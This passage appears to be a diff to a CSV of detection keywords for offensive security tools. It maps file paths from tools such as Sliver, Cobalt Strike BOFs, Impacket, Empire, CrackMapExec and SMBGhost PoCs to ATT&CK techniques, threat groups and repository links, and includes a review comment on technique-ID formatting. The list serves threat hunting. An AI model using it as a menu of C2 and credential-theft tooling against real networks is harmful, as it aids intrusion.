FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/Sleeper/Sleeper.cna*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*/sleepmask.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" 
+"*/slinky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/SlinkyCat.git*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" -"*/sliver.git*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/sliver.pb.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/sliver.proto*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/sliver/evasion/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/sliver-server*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/smb.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*/smb/psexec.rb*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/SMB_RPC/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/sliver.git*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver.pb.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver.proto*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver/evasion/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary 
emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver-server*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/smb.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/smb/psexec.rb*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/SMB_RPC/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/smb2-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb2-security-mode.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb2-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb2-vuln-uptime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/smb3.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/smb3.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/smb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-cmds.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/smb-double-pulsar-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/SMBeagle*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*/SMBeagle*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*/smb-enum-domains.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-groups.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
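Review bot: The five re-added sliver rows in this hunk (`*/sliver.git*` through `*/sliver-server*`) still write sub-techniques with a hyphen (`T1573-001`, `T1059-003`, `T1574-001`, `T1569-002`), while the other rows in the hunk use the ATT&CK dot form (`T1573.002`, `T1059.003`), so a consumer that splits `metadata_tool_techniques` on ` - ` and resolves the IDs against ATT&CK will drop the sliver mappings. These lines are already being rewritten for the star counts, so normalise them to the dot form (`T1573.001 - T1573.002 - T1059.001 - T1059.003 - T1059.004 - ...`); `T1573-003` to `T1573-005` do not appear to correspond to published sub-techniques and should be checked rather than converted blindly. The `monkey` row in the following hunk has a related problem: its techniques are space-separated (`T1587 T1570 T1021 T1072 T1550`) and its tactics field is `N/A`. The newly added `*/slinky.py*` row is categorised `Credential Access` but its tactics list has no `TA0006`, so confirm which of the two is intended.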
@@ -5309,16 +5366,16 @@ "*/smb-enum-sessions.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/smbexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/smbexec.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*/smbexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/smbexec.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*/smb-flood.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/SMBForwarder.txt*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/SMBForwarder.txt*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/SMBGhost/scanner.py*","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","647","206","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z" "*/SMBGhost_RCE*","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","10","1264","355","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z" -"*/smbldap.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/smbldap.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*/smb-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
